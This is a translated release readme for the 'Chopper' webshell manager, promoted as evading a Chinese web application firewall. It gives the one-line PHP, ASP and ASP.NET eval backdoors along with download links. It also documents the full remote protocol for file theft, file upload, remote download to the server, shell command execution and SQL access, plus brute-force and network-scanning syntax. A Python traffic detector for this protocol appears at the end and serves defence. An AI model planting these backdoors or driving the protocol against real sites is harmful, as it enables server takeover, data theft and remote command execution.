2015 latest special Dog-bypass edition of Chopper, gets past the most recent Security Dog V4.2!

Source: Internet
Author: User

1. Support Server Security Dog V4.1.08893

2. Support Website Security Dog V3.3.09060

3. Increase the power of special command function


Baidu Network disk: Http://pan.baidu.com/s/1gdtiTTh

51CTO Download: http://down.51cto.com/data/2037909

(If a link has stopped working, please report it on the official website: www.cncaidao.net)


----------------------------------------------------------------------------------------------------------
Disclaimer:
Please pay attention to the use of the environment and comply with national laws and regulations!
The vendor does not assume any responsibility for the consequences of improper use!
----------------------------------------------------------------------------------------------------------
The program will inevitably show various bugs in use. Check the official website for an update; the bug may already have been fixed.
----------------------------------------------------------------------------------------------------------

Compiled in Unicode mode; supports multi-language input and display.
In a non-Simplified-Chinese environment the interface switches to English automatically. Please leave a message about any translation errors.

I. Script client (including but not limited to eval)
1) Basic information
The eval server side needs only one simple line of code for this program to provide the common management functions. The function code is encoded twice before transmission, which greatly improves its ability to get past an IDS.
Currently supported server-side scripts: PHP, ASP, ASP.NET; websites that use HTTPS secure connections are also supported.
The code that runs on the server is as follows:
PHP: <?php @eval ($_post[' Chopper ');? >
ASP: <%eval Request ("Chopper")%>
asp: <%@ page language= "Jscript"%><%eval (request.item["Chopper"], "unsafe");%>
(Note: for ASP.NET, put the code in a separate file, or the file it is in must also be a JScript script)
Customize: custom type. The function code is stored on the server, so in theory every dynamic scripting language is supported, as long as the script interacts correctly with Chopper.
This mode can be tailored on demand: if you only need directory browsing, or only the virtual terminal, the code can be very short.

Connection password that includes the date, server-side form:
asp:
<%@ page language= "Jscript"%><%eval (request.item[formsauthentication.hashpasswordforstoringinconfigfile (String.Format ("{0:YYYYMMDD}", DateTime.Now.ToUniversalTime ()) + "37e4dd20c310142564fc483db1132f36", "MD5"). ToUpper ()], "unsafe");%>
Php:
@eval ($_post[strtoupper (MD5 (gmdate ("YMD"). " 37e4dd20c310142564fc483db1132f36 ")]);
For example: if the password entered in Chopper is chopper, add three characters in front, so the new password is: {d}chopper


2) The main functions
In the main view, right-click and choose Add. In the dialog that pops up, enter the server-side address and the connection password (note the string pass in the earlier example), then select the correct script type and language encoding.
After saving, these function blocks are available: file management, virtual terminal, database management, and self-written scripts.
1. File management: [Feature] caches downloaded directories and supports viewing cached directories offline.
2. Virtual terminal: [Feature] user-friendly design, easy to operate (enter help to see more usage). Extra-long commands are split into 5k-byte pieces and submitted separately.
3. Database management: [Feature] graphical interface; supports MySQL, MSSQL, Oracle, Infomix, Access, and any database that can be connected in ADO mode.
If you are fluent in SQL syntax, why would you still need phpMyAdmin? Moreover, Chopper supports database management under any of the script types.
(For the database connection method under each script type, click the configuration button in the upper left corner of the database management interface.)
4. Self-written scripts: after simple encoding, the user's own script is submitted to the server for execution, which allows rich functionality; you can also choose to send it to the browser for execution.
If you want to write your own CCC script, refer to the sample code in the CCC directory; you should be able to write a feature-rich script too.
You can download other people's CCC scripts from the website, or share your own work.
Note: some features may not work properly because of server security settings.

3) How to fill in the configuration information
---------------------------------------------------------------------------------------
A) Database settings:
-----------------------------------------------------------------------------
PHP script:
<T>type</T> The type can be one of Mysql, mssql, oracle, infomix
<H>host address</H> The host address can be a machine name or an IP address, such as localhost
<U>database user</U> The user name used to connect to the database, such as root
<P>database password</P> The password used to connect to the database, such as 123455

<L>utf8</L> Optional; used when the database type is MySQL and the script is PHP. Not needed for Latin1.

ASP and ASP.NET script:
<T>type</T> The type can only be ADO
<C>ADO configuration information</C>
ADO connects to each kind of database in a different way. For MSSQL, for example, the configuration information is
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
NT authentication login to an MSSQL database is also supported, and the query result list can be exported as an HTML file.

Customize script:
<T>type</T> The type can only be XDB
<X>configuration information in the format agreed with the Customize script</X>
For the Customize.jsp shipped with Chopper, the database parameters are filled in as follows (two lines):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
</X>
MySQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/[email protected]:1521/test
</X>

B) Other aspects:
-----------------------------------------------------------------------------
Attach extra data to every submission. For example, with this new server side for ASP:
<%
Set o = Server.CreateObject ("ScriptControl")
O.language = "VBScript"
O.addcode (Request ("SC"))
O.run "FF", Server,response,request,application,session,error
%>
the following is filled in at the configuration in Chopper:
&LT;O&GT;SC=FUNCTION+FF (Server,response,request,application,session,error): eval (Request ("Pass")): End+function </O>
Then use the password pass to connect.

POST an additional packet before a function is submitted (only once per session):
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>

Example of default terminal program path setting:
<SHELL>/bin/sh</SHELL>

Examples of virtual terminal default command settings:
<CMD>whoami</CMD>

Example of directory settings open by default for file management:
<CD>c:\windows\temp\</CD>

3) HTTP login verification
Fill in the shell address like this: http://user:[email protected]/server.asp
Special characters in the user name or password can be written with URL encoding.

4) Data import: in the shell list view, right-click and use the menu to import another Chopper database into the current category.

II. Security scan
Spider crawling, bound-domain lookup, directory brute-forcing.
Command explanation:
A) Look up the domain names bound to a single IP
{REVERSE_IP} {url:http://www.maicaidao.com/}
B) Scan this C segment for open web servers and look up the bound domain names
{Reverse_ip_c} {url:http://www.maicaidao.com/}
C) Only scan this C segment for open web servers
{Reverse_ip_c} {url:http://www.maicaidao.com/} {Port}
D) Spider crawling
{Spider} {url:http://www.maicaidao.com/}
E) Spider crawling with a crawl range set
{Spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) Spider crawling that filters duplicate URLs to speed things up
Add {filter}
G) Brute-force function; %s is one line of the Dict file
Flag: followed by the keyword to look for in the returned data (HTTP headers included)
With !! in front, the result is true when the keyword is absent; otherwise it is true when the keyword is present
list.txt is a file in the current directory; an absolute path can also be given. Note: do not include too many lines.
Note: starting with version 20100626, list.txt must be a Unicode text file
{Crack} {url:http://%s/admin/} {flag:http/1.1 200} {Dict:list.txt}
{Crack} {url:http://%s/admin/} {flag:!! http/1.1 404} {Dict:list.txt}
{Crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {Dict:list.txt}

III. Timed reminders
Can be used as an alarm clock. Cycle: monthly / weekly / daily / once only.

IV. Quick start
Some commonly used shortcuts are kept here, and you can specify the user identity under which a program runs. This data is stored encrypted.

V. Browser
A dedicated web browser: POST browsing / custom cookies / executing custom scripts / auto-refreshing pages / searching for web pages on the same IP.
If an Ip.dat library is present, the status bar shows the site's IP and country code.

VI. Other parts
To be added.



--------------------------------------------
20110628 Update Considerations
It is best to rebuild the cache library.
--------------------------------------------


File description:
------------------------------------------------------------------
Chopper.exe        Chopper program
Db.mdb             Chopper's main database
------------------------------------------------------------------
CACHE.TMP          Chopper's cache database (can be deleted)
Readme.txt         The file you are reading now (can be deleted)
<CCC>              Chopper's self-written scripts (can be deleted)
<Customize>        Customize mode server side (can be deleted)
    Customize.aspx     A sample C# server side (full-featured)
    Customize.jsp      A sample JSP server side (full-featured)
    Customize.cfm      A sample CFM server side (file management, virtual terminal)



-----------------------------------------------------------------------------------------------------------------------------------
Customize mode: communication interface between Chopper and the server side
Server-side code in other languages can be written to this interface (see Customize.jsp / Customize.cfm)
-----------------------------------------------------------------------------------------------------------------------------------
Example: the password filled in on the Chopper client is pass, and the selected page encoding is GB2312 (the JSP server side uses this parameter)
Note: all parameters are submitted by POST; the returned data uses ->| as the start marker and |<- as the end marker.
Note: a returned error message starts with error://
Note: \t stands for a tab, \r\n for a carriage return plus newline, \n for a newline
Note: the database configuration information is a single string; the server-side script can define its own format for this string.
-----------------------------------------------------------------------------------------------------------------------------------

[Get the absolute path of the current directory]
Submit: pass=a&z0=gb2312
Return: the absolute path of the directory followed by \t; on a Windows system this is followed by the list of drives
Example: c:\inetpub\wwwroot\	c:d:e:k:
Example: /var/www/html/

[Browse directory]
Submit: pass=b&z0=gb2312&z1=absolute path of the directory
Return: directories first, then files; a / is appended to directory names and not to file names
Example:
directory name/\ttime\tsize\tattributes\ndirectory name/\ttime\tsize\tattributes\n
file name\ttime\tsize\tattributes\nfile name\ttime\tsize\tattributes\n

[Read text file]
Submit: pass=c&z0=gb2312&z1=absolute path of the file
Return: the contents of the text file

[Write text file]
Submit: pass=d&z0=gb2312&z1=absolute path of the file&z2=file contents
Return: 1 on success, an error message on failure

[Delete file or directory]
Submit: pass=e&z0=gb2312&z1=absolute path of the file or directory
Return: 1 on success, an error message on failure

[Download file]
Submit: pass=f&z0=gb2312&z1=absolute path of the file on the server
Return: the contents of the file to download

[Upload file]
Submit: pass=g&z0=gb2312&z1=absolute path of the uploaded file&z2=file contents (hexadecimal text format)
Return: the contents of the file to download

[Copy and paste file or directory]
Submit: pass=h&z0=gb2312&z1=absolute path to copy from&z2=absolute path to paste to
Return: 1 on success, an error message on failure

[Rename file or directory]
Submit: pass=i&z0=gb2312&z1=original name (absolute path)&z2=new name (absolute path)
Return: 1 on success, an error message on failure

[New directory]
Submit: pass=j&z0=gb2312&z1=new directory name (absolute path)
Return: 1 on success, an error message on failure

[Modify file or directory time]
Submit: pass=k&z0=gb2312&z1=absolute path of the file or directory&z2=time (format: yyyy-MM-dd HH:mm:ss)
Return: 1 on success, an error message on failure

[Download file to server]
Submit: pass=l&z0=gb2312&z1=URL path&z2=absolute path to save to after download
Return: 1 on success, an error message on failure

[Execute shell command (the shell path is prefixed with the -c or /c parameter according to the server system type)]
Submit: pass=m&z0=gb2312&z1=(-c or /c) plus shell path&z2=shell command
Return: the command execution result

[Get basic information about the database]
Submit: pass=n&z0=gb2312&z1=database configuration information
Return: the databases on success (\t-delimited), an error message on failure

[Get database table names]
Submit: pass=o&z0=gb2312&z1=database configuration information\r\ndatabase name
Return: the data tables on success (\t-delimited), an error message on failure

[Get data table column names]
Submit: pass=p&z0=gb2312&z1=database configuration information\r\ndatabase name\r\ndata table name
Return: the data columns on success (\t-delimited), an error message on failure

[Execute database command]
Submit: pass=q&z0=gb2312&z1=database configuration information\r\ndatabase name&z2=SQL command
Return: the data table contents on success, an error message on failure
Note: the first row returned is the header, followed by each data row; the number of columns must be consistent. Each column in a row is followed by the marker \t|\t, and each row ends with \r\n
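
For defenders, the interface above is a stable traffic signature: a POST with one single-letter action value, a fixed set of z0/z1/z2 parameters, and a response wrapped in ->| and |<-. The Python below is an added detection example, not part of the original readme or of the tool; the function names, the case-insensitive matching, the error:// check inside the frame, and the sample traffic are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Number of z-parameters (z0, z1, z2) each action code takes, per the interface above.
ARITY = {**dict.fromkeys("a", 1),
         **dict.fromkeys("bcefjnop", 2),
         **dict.fromkeys("dghiklmq", 3)}
FRAME = re.compile(r"->\|(.*)\|<-", re.S)   # response wrapped in ->| ... |<-

def classify(post_body: str, response_body: str) -> dict:
    """Score one request/response pair against the Customize-mode interface."""
    params = parse_qs(post_body, keep_blank_values=True)
    z_names = {k for k in params if re.fullmatch(r"z\d", k)}
    # The password parameter can have any name (it may even change daily),
    # so look for any non-z parameter whose whole value is one action letter.
    # Assumption: letter case is ignored.
    action = next((v[0].lower() for k, v in params.items()
                   if k not in z_names and len(v) == 1 and v[0].lower() in ARITY), None)
    request_match = (action is not None and
                     z_names == {f"z{i}" for i in range(ARITY[action])})
    m = FRAME.fullmatch(response_body.strip())
    payload = m.group(1) if m else response_body
    return {
        "action": action,
        "request_match": request_match,
        "framed": m is not None,
        "error": payload.lstrip().lower().startswith("error://"),
        "suspicious": request_match and m is not None,
    }

# Constructed sample traffic (not captured from a real system).
SAMPLES = [
    ("pass=a&z0=gb2312", "->|/var/www/html/\t|<-"),
    ("k9=C&z0=gb2312&z1=%2Fvar%2Fwww%2Fhtml%2Fmissing.txt", "->|error:// not found|<-"),
    ("user=a&comment=hello", "<html>thanks</html>"),      # ordinary form post
    ("q=b&z0=1&z1=2", "<html>search results</html>"),     # right shape, no framing
]

def flagged(samples=SAMPLES):
    """Return indexes of samples that match on both request shape and framing."""
    return [i for i, (req, resp) in enumerate(samples) if classify(req, resp)["suspicious"]]

if __name__ == "__main__":
    for i, (req, resp) in enumerate(SAMPLES):
        print(i, classify(req, resp))
```

Requiring both the request shape and the response framing keeps ordinary forms that happen to carry a one-letter field out of the results; run it over decoded proxy or WAF body logs, since the POST body is not in a standard access log.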
